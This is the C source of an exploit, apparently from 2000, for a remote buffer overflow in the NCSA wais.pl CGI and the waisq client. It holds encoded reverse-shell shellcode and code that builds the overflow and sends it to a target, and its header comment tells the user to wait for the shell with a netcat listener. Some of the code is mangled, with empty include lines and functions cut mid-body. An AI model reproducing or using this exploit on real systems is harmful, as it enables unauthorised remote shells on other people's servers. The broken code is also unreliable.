/* OnWaisKlote.c - NCSA wais.pl + waisq remote overflow - by Scrippie This program is meant as a PoC exploit - I don't think anyone will go and find a Linux machine running the wais.pl CGI and the waisq backend client at the same time. However, there are enough SunOS@Sparcs out there which do. Thanx to dvorak for pointing out this smash after I located the formatting problem in wais.pl The shellcode makes a connetion to the given IP and spawns a shell on port 27002. It's recommended to have a listening netcat ready on this port. Ie. do a "nc -l -p 27002" on your machine, and run the exploit on the target If everything works out, it'll connect and spawn a shell. Shouts go out to: sk8, JimJones, ragnarok, f0bic, dvorak, guidob, dethy, dugo, ratcorpse, futant, and everyone on #!/bin/zsh I haven't mentioned mixter, Lamagra, prizm-, slash, cruci, {}, and all ex-b0f people #hit2000, #phreak.nl, #linuxasm and of course Synnergy.net Big fuck to: #hax - Skill will never make up for arrogance and basic unfriendliness flyahh - For being the biggest script-kid I know Love to: Maja (I can't explain how happy I am now you're coming to the Netherlands) Hester (you're my dearest friend) -- Scrippie/ronald@grafix.nl */ #include #include #include #include #include #include #include #define FORBIDDEN "\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\"" #define SZ_SOURCEBUF 256 #define SZ_FILEBUF 256 #define RETADDY 0xbffff910 /* Works on my cute `lil box */ int wwwconnect(unsigned long ip); int ICinInt(long, char *, size_t); char *buildOverflow(unsigned long, unsigned int); void *xmalloc(size_t); /* Shellcode written by: Scrippie :) Smegma v0.5 ridded this shellcode of the following characters: "\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\"" For this purpose a xor mask of 0x92011e11 was brute forced */ char hellcode[] = "\xeb\x14\x58\x89\xc6\x31\xc9\xb1\x25\x81\x36\x11\x1e\x01\x92\x83\xc6\x04\xe2" "\xf5\xeb\x05\xe8\xe7\xff\xff\xff\xfa\x64\x5f\xa3\xd1\x2f\xda\xa3\xc3\xae\x67" "\x21\x10\x93\x4f\x8e\xa3\x1f\x88\xc4\x31\xac\x07\x1b\x47\x3a\xb3\x90\x98\x48" "\x1d\x5f\x91\x97\x47\x8a\x98\x08\x67\x55\x57\x1c\x68\xe8\x98\x58\x1d\x1f\x17" "\x97\x47\xb2\x91\xdc\x0f\x1b\x47\x3a\x30\x52\x15\x78\x81\x51\x13\x93\x4f\x8e" "\xdc\x9e\x30\x52\x15\x21\x88\x50\x9a\x40\x19\xa3\xd8\xd3\x81\x1b\xc1\x5f\xcc" "\x12\x98\xce\x40\x5f\x91\x2f\xc1\x1f\x6f\x11\x81\x53\x16\xed\xab\x96\x1a\x93" "\x5f\x9a\x98\x40\x11\x1f\x5f\x0e\x30\x40\xdc\x9e\x30\x52\xef\xde\xcc\x12\xf9" "\x9f\xfe\x6d\xee\x5f\x40\xd0\x53\xAA\xAA\xAA\xAA\x31\x63\xfb\x7f\x31\x72\xfa"; /* The IP address to connect to is gonna be at 0xAAAAAAAA */ /* Make sure it's encoded just as the shellcode is */ int main(int argc, char **argv) { char *iploc, *evilcode; int sd, align=0; unsigned long sip; /* IP to connect back to */ unsigned long dip; /* Target IP */ unsigned long retaddy=RETADDY; /* Default return address */ /* Whee, print the banner */ if(argc < 3) { printf("OnWais Klote - Scrippie/Synnergy Networks\n"); printf("Use as: %s [ret addy] [align]\n", argv[0]); exit(0); } printf("******************************************************\n"); printf("+ OnWais Klote - Scrippie/Synnergy.net +\n"); printf("******************************************************\n"); /* I know inet_addr() is obsolete - too bad, you can't run this program when you're on - who is anyway? */ if((dip = inet_addr(argv[1])) == -1) { printf("Error: Non valid IP address specified\n"); exit(-1); } if((sip = inet_addr(argv[2])) == -1) { printf("Error: Non valid IP address specified\n"); exit(-1); } /* Use specified return address */ if(argc > 3) { retaddy = strtoul(argv[3], NULL, 16); } printf("Return address : 0x%lx\n", retaddy); /* Use specified alignment */ if(argc > 4) { align = atoi(argv[4]); } printf("Alignment : %d\n", align); printf("Target : %s\n\n", argv[1]); /* We convert our IP to fit in the payload */ /* Think of this as a strange value? Think of the shellcode alignment */ sip ^= 0x1192011e; /* Check if the given RETADDY won't ruin our payload */ if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf("Error: Found illegal character in return address\n"); exit(0); } /* Check if the given IP won't ruin our shellcode */ if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf("Error: Found illegal character in IP address\n"); exit(0); } /* Locate the IP position in the shellcode */ iploc=(char *)strchr(hellcode, 0xAA); memcpy((void *) iploc, (void *) &sip, 4); evilcode = buildOverflow(retaddy, align); sd = wwwconnect(dip); printf("Connected to %s\n", argv[1]); printf("Proceeding to send evil code...\n"); send(sd, evilcode, strlen(evilcode), 0); printf("Sent!\n"); return(0); } char *buildOverflow(unsigned long retaddy, unsigned int align) { char source[SZ_SOURCEBUF]; char *smash, *output; int c; smash = (char *)xmalloc(SZ_FILEBUF+align+1); output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1); for(c=0;c> j*8) == forbidden[i]) return(1); } } return(0); } /* Wrapper for malloc() that does error checking */ void *xmalloc(size_t size) { void *blah; if((blah = malloc(size)) == NULL) { perror("malloc()"); exit(-1); } return(blah); } /* www.hack.co.za [22 August 2000]*/